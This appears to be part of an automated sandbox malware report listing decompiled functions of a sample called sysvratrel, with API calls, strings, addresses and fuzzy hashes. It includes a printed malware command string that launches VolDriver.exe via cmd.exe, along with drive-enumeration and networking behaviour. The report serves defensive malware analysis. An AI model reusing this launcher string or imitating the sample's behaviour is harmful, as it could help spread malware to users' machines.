Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: CreateInitializeInstancewsprintf
String ID: $h@$%windir%\System32\cmd.exe$/c start .\%s & start .\%s\VolDriver.exe
API String ID: 2038452267-1952734972
Opcode ID: aa8a32cb6d162733ff770eaad9f94bc5271c9336f419dc8e96cac525845bdcf3
Instruction ID: ff343e69aad13d9306a4779b19c6e3e8efaa2fda419abce3ce5a22e1d679f985
Opcode Fuzzy Hash: aa8a32cb6d162733ff770eaad9f94bc5271c9336f419dc8e96cac525845bdcf3
Instruction Fuzzy Hash: 0631D975A40208EFCB04DF98D885EDEB7B5EF88704F108199E519A73A5CB74AE81CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040E4C1 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(00000000,device), ref: 0040E53C
lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E58B
SysFreeString.OLEAUT32(00000000), ref: 0040E59F
SysFreeString.OLEAUT32(00000000), ref: 0040E5B7

Strings

deviceType, xrefs: 0040E546
device, xrefs: 0040E533

Memory Dump Source

Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: FreeStringlstrcmpi
String ID: device$deviceType
API String ID: 1602765415-3511266565
Opcode ID: 5397dffdce9bfa1d28fd9043f65dc7fff47123e69829d8d1bf88c428b6381307
Instruction ID: 4edf041377c7e14b34ff85b7b029659f12f4b503add3d656b401b028ce93b30a
Opcode Fuzzy Hash: 5397dffdce9bfa1d28fd9043f65dc7fff47123e69829d8d1bf88c428b6381307
Instruction Fuzzy Hash: AB31DC70A0010AEFDB14CFD5DC84BAFB7B5AF48304F108969E515A7390E778EA45CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0040E361 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(00000000,service), ref: 0040E3DC
lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E42B
SysFreeString.OLEAUT32(00000000), ref: 0040E43F
SysFreeString.OLEAUT32(00000000), ref: 0040E457

Strings

service, xrefs: 0040E3D3
serviceType, xrefs: 0040E3E6

Memory Dump Source

Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: FreeStringlstrcmpi
String ID: service$serviceType
API String ID: 1602765415-3667235276
Opcode ID: f7a49091048d5f2f7edd1107e0f91d764ba8354fbf103c94dbc5479e42702eb7
Instruction ID: ed37c26d591e2f51ed35895ea84be071d11e51b9472e036d4bc20704c2c7b13d
Opcode Fuzzy Hash: f7a49091048d5f2f7edd1107e0f91d764ba8354fbf103c94dbc5479e42702eb7
Instruction Fuzzy Hash: 0E31EAB1A0020ADFCB04DF99D884FAFB7B5BF48304F108569E515B73A0D778AA85CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00407380 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 72sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000003E8), ref: 00407404
Sleep.KERNEL32(000003E8), ref: 00407433
wsprintfA.USER32 ref: 0040745E
DeleteUrlCacheEntry.WININET(?), ref: 0040746E
Sleep.KERNEL32(000DBBA0), ref: 004074B6

Strings

%s%s, xrefs: 00407452

Memory Dump Source

Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: Sleep$CacheDeleteEntrywsprintf
String ID: %s%s
API String ID: 1447977647-3252725368
Opcode ID: 588e7e45e4f33f9d0918584f63058166f89edb9a452884b7bd86cb7a942d91ee
Instruction ID: a0bb0d1763f58919fadf504be34b28e9f79e59c8b133fe7279793914b8ec670d
Opcode Fuzzy Hash: 588e7e45e4f33f9d0918584f63058166f89edb9a452884b7bd86cb7a942d91ee
Instruction Fuzzy Hash: 92310AB0D05218EFCB50DF99DC88BDDBBB4FB48304F1085AAE609B6290D7795A84CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00406340 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 55registryCOMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNEL32 ref: 00406346
RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406394
RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 004063C1
RegCloseKey.ADVAPI32(?), ref: 004063DE

Strings

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 00406387
NoDrives, xrefs: 004063B8

Memory Dump Source

Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: CloseDrivesLogicalOpenQueryValue
String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
API String ID: 2666887985-3471754645
Opcode ID: 46903cfc04ebe2d267c9076d905ed80b260209c2cd6c3f03203de3a9be594a56
Instruction ID: 85ff322c7a95afac5eb7bad71570108e7de378f82f6edd769b1cbb34207a952c
Opcode Fuzzy Hash: 46903cfc04ebe2d267c9076d905ed80b260209c2cd6c3f03203de3a9be594a56
Instruction Fuzzy Hash: 7F11D071E40209DBDB10CFD0D946BEEBBB4FB08704F108159E915B7280D7B8A655CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0040D3A0 Relevance: 9.1, APIs: 6, Instructions: 80threadCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D3C4

Part of subcall function 0040D490: WaitForSingleObject.KERNEL32(?,00000000), ref: 0040D4D0
Part of subcall function 0040D490: CloseHandle.KERNEL32(?), ref: 0040D4E9

CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040D41F
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D45C
GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D467
DuplicateHandle.KERNEL32(00000000), ref: 0040D46E
LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D482

Memory Dump Source

Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: CriticalCurrentHandleProcessSection$CloseCreateDuplicateEnterLeaveObjectSingleThreadWait
String ID:
API String ID: 2251373460-0
Opcode ID: 5fa48f327af51f71990b0ea36d5f90ef72817f248d38badcc5e164c225a1f3f1
Instruction ID: 3905a71daa0159e526e2bdbd6071991b109cebefbf6d86c4cf37b1ecd5ad8e98
Opcode Fuzzy Hash: 5fa48f327af51f71990b0ea36d5f90ef72817f248d38badcc5e164c225a1f3f1
Instruction Fuzzy Hash: F831F8B4A00208EFDB04DF94D889F9EBBB5EB48308F0081A9E945A7390D775AA95CF54

Uniqueness

Uniqueness Score: -1.00%

Function 004090F0 Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

_allshl.NTDLL ref: 004090FD
_aullshr.NTDLL ref: 0040910E
_allshl.NTDLL ref: 00409130
_aullshr.NTDLL ref: 0040914C
_allshl.NTDLL ref: 0040916E
_aullshr.NTDLL ref: 0040918A

Memory Dump Source

Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: _allshl_aullshr
String ID:
API String ID: 673498613-0
Opcode ID: 9155782f3457772601139595953a0e4fee1c65b8433155f9dc873cd430b809bd
Instruction ID: a69f75a9761dffb427665dfb7b283027f7726bbdceffba7061474d3de6b788b4
Opcode Fuzzy Hash: 9155782f3457772601139595953a0e4fee1c65b8433155f9dc873cd430b809bd
Instruction Fuzzy Hash: 0B111F326005186B8B10EF5EC44268ABBD6EF84361B15C136FC2CDF35AD675D9414BD4

Uniqueness

Uniqueness Score: -1.00%

Function 00401200 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 106networkCOMMON

Download Yara Rule

APIs

memcpy.NTDLL(00000004,00000000,?,?), ref: 00401258
htons.WS2_32(?), ref: 00401281
sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 004012A9
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004012BE

Strings

pdu, xrefs: 0040121D

Memory Dump Source

Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: ExchangeInterlockedhtonsmemcpysendto
String ID: pdu
API String ID: 2164660128-2320407122
Opcode ID: 91b30ad39cb42ad1c5fa696c873bf215f40042e2e73f1e3bbc8ac8a0414f7340
Instruction ID: 2eaa47314137ae48bc86a2d98b28c98b453a90a93c27253c89cefaff09ddeb80
Opcode Fuzzy Hash: 91b30ad39cb42ad1c5fa696c873bf215f40042e2e73f1e3bbc8ac8a0414f7340
Instruction Fuzzy Hash: 7031B2362083009BC710DF6DD880A9BBBE4AFC9714F04457EFD98A7382D6349914C7AB

Uniqueness

Uniqueness Score: -1.00%

Function 00401820 Relevance: 7.6, APIs: 5, Instructions: 116COMMON

Download Yara Rule

APIs

InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401846
InterlockedDecrement.KERNEL32(?), ref: 004018B1

Part of subcall function 004017A0: EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
Part of subcall function 004017A0: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
Part of subcall function 004017A0: LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD

Memory Dump Source

Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: Interlocked$CriticalExchangeSection$DecrementEnterLeave
String ID:
API String ID: 3966618661-0
Opcode ID: 5b1d9706ac0f4861890903663e3aab6c9f99d0d6f1a575e52deddebed6e66e4c
Instruction ID: 99e37592b547e3d1ed5d588db8744cb94e6869326ec40c3cf91f75bef10dfbd8
Opcode Fuzzy Hash: 5b1d9706ac0f4861890903663e3aab6c9f99d0d6f1a575e52deddebed6e66e4c
Instruction Fuzzy Hash: CA41A175604B02ABC718DB39D848797F3A4BF84314F14827EE82D933D1E739A855CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040ADC0 Relevance: 7.6, APIs: 5, Instructions: 74fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00417490,40000000,00000000,00000000,00000002,00000002,00000000), ref: 0040AE58
WriteFile.KERNEL32(000000FF,00000000,?,?,00000000), ref: 0040AE79
FlushFileBuffers.KERNEL32(000000FF), ref: 0040AE83
CloseHandle.KERNEL32(000000FF), ref: 0040AE8D
InterlockedExchange.KERNEL32(00416068,0000003D), ref: 0040AE9A

Memory Dump Source

Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: File$BuffersCloseCreateExchangeFlushHandleInterlockedWrite
String ID:
API String ID: 442028454-0
Opcode ID: 357d87ca73b11ea0aaada163076beaff9b4c740b73e671433b9cbd3897c2d74f
Instruction ID: 0da220b8b1f77c32e275edd0b19d3e77d455ccd5d956affd98337f50121a7ab7
Opcode Fuzzy Hash: 357d87ca73b11ea0aaada163076beaff9b4c740b73e671433b9cbd3897c2d74f
Instruction Fuzzy Hash: D5315EB8A40309EBCB14CF98DC45F9EB771FB48300F208569E51567390D774AA51CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00408CD0 Relevance: 7.5, APIs: 5, Instructions: 48COMMON

Download Yara Rule

APIs

_allshl.NTDLL ref: 00408CDE
_allshl.NTDLL ref: 00408CED
_allshl.NTDLL ref: 00408CFC
_allshl.NTDLL ref: 00408D0B
_allshl.NTDLL ref: 00408D1A

Memory Dump Source

Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: _allshl
String ID:
API String ID: 435966717-0
Opcode ID: e97f6b688e4649d03a543f53d1e87ffd622cab317a47a1f81aa90ba96deec30e
Instruction ID: bcae3434c2129d449cda67bd59c491ccebf17daabcdef2e049336039ec6bac91
Opcode Fuzzy Hash: e97f6b688e4649d03a543f53d1e87ffd622cab317a47a1f81aa90ba96deec30e
Instruction Fuzzy Hash: 3EF03172901428AB9750EEFF85424CBF7E69F98365F218176F81CE3261E9709D0546F2

Uniqueness

Uniqueness Score: -1.00%

Function 00401330 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42synchronizationCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040D79D,00000000), ref: 00401346
WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040D79D,00000000), ref: 00401352
CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040D79D,00000000), ref: 0040135C

Part of subcall function 0040A3F0: HeapFree.KERNEL32(?,00000000,00402612,?,00402612,?), ref: 0040A44B

Strings

pdu, xrefs: 00401339

Memory Dump Source

Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: CloseEventFreeHandleHeapObjectSingleWait
String ID: pdu
API String ID: 309973729-2320407122
Opcode ID: e0f329f12d2259528821c27011c0918a976d96f57bacaacdd1962e62a77ab920
Instruction ID: d174ec339e303b727d6f690e0c81bd26c44cc0430c196550e953614590448db6
Opcode Fuzzy Hash: e0f329f12d2259528821c27011c0918a976d96f57bacaacdd1962e62a77ab920
Instruction Fuzzy Hash: 0C01D6765003009BCB249F55ECC0D9B7769AF49311704467AFC05AB396C638E8508775

Uniqueness

Uniqueness Score: -1.00%

Function 004062C0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

GetDriveTypeW.KERNEL32(0040629F), ref: 004062CD
QueryDosDeviceW.KERNEL32(0040629F,?,00000208), ref: 0040630C
StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 00406324

Strings

\??\, xrefs: 00406318

Memory Dump Source

Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: DeviceDriveQueryType
String ID: \??\
API String ID: 1681518211-3047946824
Opcode ID: 1f4486d3417c416fbe6947eda0d50e0154391f7c0caa962a9d661e7b197f6568
Instruction ID: fe1cba3e8f96ca8ec28924db8accccc61f2e919e988f9d14e04ecf4ac666ff3a
Opcode Fuzzy Hash: 1f4486d3417c416fbe6947eda0d50e0154391f7c0caa962a9d661e7b197f6568
Instruction Fuzzy Hash: 1901FFB0A4021CEBCB20DF55DD49BDAB7B4AB04704F00C0BAAA05A7280E6759ED5DF9C

Uniqueness

Uniqueness Score: -1.00%

Function 0040E9B0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(`k@,80000000,00000001,00000000,00000003,00000000,00000000,00406B60), ref: 0040E9D0
GetFileSize.KERNEL32(000000FF,00000000), ref: 0040E9E5
CloseHandle.KERNEL32(000000FF), ref: 0040E9F2

Strings

`k@, xrefs: 0040E9CC, 0040E9CF

Memory Dump Source

Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSize
String ID: `k@
API String ID: 1378416451-1195631054
Opcode ID: df23a932ebc1e553a736a6907ae04855c01650ef694a25ef55576e6386c5cc64
Instruction ID: 241503f102ff988800a1529ff4214dfa730f02490b079578101ca7fb38dafef3
Opcode Fuzzy Hash: df23a932ebc1e553a736a6907ae04855c01650ef694a25ef55576e6386c5cc64
Instruction Fuzzy Hash: F7F01C74A40308FBDB20DFA4DC49B8DBBB4AB04701F208295FA04BB2D0D6B56A908B44

Uniqueness

Uniqueness Score: -1.00%

Function 00401100 Relevance: 6.1, APIs: 4, Instructions: 86synchronizationCOMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32 ref: 0040112B
recvfrom.WS2_32 ref: 0040119C
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004011B2
WaitForSingleObject.KERNEL32(?,00000001), ref: 004011D3

Memory Dump Source

Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: ExchangeInterlockedObjectSingleWaitioctlsocketrecvfrom
String ID:
API String ID: 3980219359-0
Opcode ID: 7cf137ea0161487f7737358bd29a50fac6b28174b756953d330c0cbf6919b593
Instruction ID: e93cb10c30494a4e33d228fb1a439b2c2c35c7ccb48714dd22f79771c93e9d83
Opcode Fuzzy Hash: 7cf137ea0161487f7737358bd29a50fac6b28174b756953d330c0cbf6919b593
Instruction Fuzzy Hash: E921E5B11043016FC304DF65DC84A6BB7E9EF88314F004A3EF55592290E774DD4887EA

Uniqueness

Uniqueness Score: -1.00%

Function 00401F50 Relevance: 6.1, APIs: 4, Instructions: 73networkCOMMON

Download Yara Rule

APIs

GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401F83
WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 00401FAF
WSAGetLastError.WS2_32 ref: 00401FB9
GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401FF9

Memory Dump Source

Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: CompletionQueuedStatus$ErrorLastOverlappedResult
String ID:
API String ID: 2074799992-0
Opcode ID: 6bed54afebf4a7a641f0d3d0188a4da0f589ce10c8675e9945177f158b09e6ba
Instruction ID: 85cdc4ac02e7a7d961e62fa06f42dc9c3305788cd6d7a2bd32de2e1c20a60a18
Opcode Fuzzy Hash: 6bed54afebf4a7a641f0d3d0188a4da0f589ce10c8675e9945177f158b09e6ba
Instruction Fuzzy Hash: DD212F715083159BC200DF55D884D5BB7E8BFCCB54F044A2EF59493291D734EA49CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00401C50 Relevance: 6.1, APIs: 4, Instructions: 59networksleepCOMMON

Download Yara Rule

APIs

WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401C88
WSAGetLastError.WS2_32(?,?,004021A5,00000000), ref: 00401C90
Sleep.KERNEL32(00000001,?,?,004021A5,00000000), ref: 00401CA6
WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401CCC

Memory Dump Source

Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: Recv$ErrorLastSleep
String ID:
API String ID: 3668019968-0
Opcode ID: 115ea0e646e0c4f71d919f36be7c9bac7cbabd22de7b6b0e5f0bd0a6bc0a71ea
Instruction ID: df3cbe2ca7d05c2b70b960210cdf5b20c1916dde76b22b2cec88194eea221140
Opcode Fuzzy Hash: 115ea0e646e0c4f71d919f36be7c9bac7cbabd22de7b6b0e5f0bd0a6bc0a71ea
Instruction Fuzzy Hash: 6A11AD72148305AFD310CF65EC84AEBB7ECEB88710F40492AF945D2140E679E94997B6

Uniqueness

Uniqueness Score: -1.00%

Function 00401AE0 Relevance: 6.0, APIs: 4, Instructions: 49networksleepCOMMON

Download Yara Rule

APIs

WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B0C
WSAGetLastError.WS2_32 ref: 00401B12
Sleep.KERNEL32(00000001), ref: 00401B28
WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B4A

Memory Dump Source

Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: Send$ErrorLastSleep
String ID:
API String ID: 2121970615-0
Opcode ID: 68b99e883f80ec4d8e473af3bb6ab78542c6fab184647b02e4118960a37caac2
Instruction ID: 6027246a5f20d5291fae036152240cd5c1f9414458335baedc5b4335fd2ad738
Opcode Fuzzy Hash: 68b99e883f80ec4d8e473af3bb6ab78542c6fab184647b02e4118960a37caac2
Instruction Fuzzy Hash: 8F014F712483046EE7209B96DC88F9B77A8EBC4711F508429F608961C0D7B5A9459B79

Uniqueness

Uniqueness Score: -1.00%

Function 0040D650 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 0040D669
CloseHandle.KERNEL32(?), ref: 0040D698
LeaveCriticalSection.KERNEL32(?), ref: 0040D6A7
DeleteCriticalSection.KERNEL32(?), ref: 0040D6B4

Memory Dump Source

Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: CriticalSection$CloseDeleteEnterHandleLeave
String ID:
API String ID: 3102160386-0
Opcode ID: 7bf4f18b4702a230417702d69d1d85fee5c3e33d7782737d8a2bd2494ce2794f
Instruction ID: fd906f08b3b88ca1f2a1246d33854d1cb2ade3c35c50db1fce3d72ba6cb97bf7
Opcode Fuzzy Hash: 7bf4f18b4702a230417702d69d1d85fee5c3e33d7782737d8a2bd2494ce2794f
Instruction Fuzzy Hash: 64115EB4D00208EBDB08DF94D984A9DB775FF44309F1085A9E80AA7341D739EE94DB85

Uniqueness

Uniqueness Score: -1.00%

Function 004017A0 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 00401808

Memory Dump Source

Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

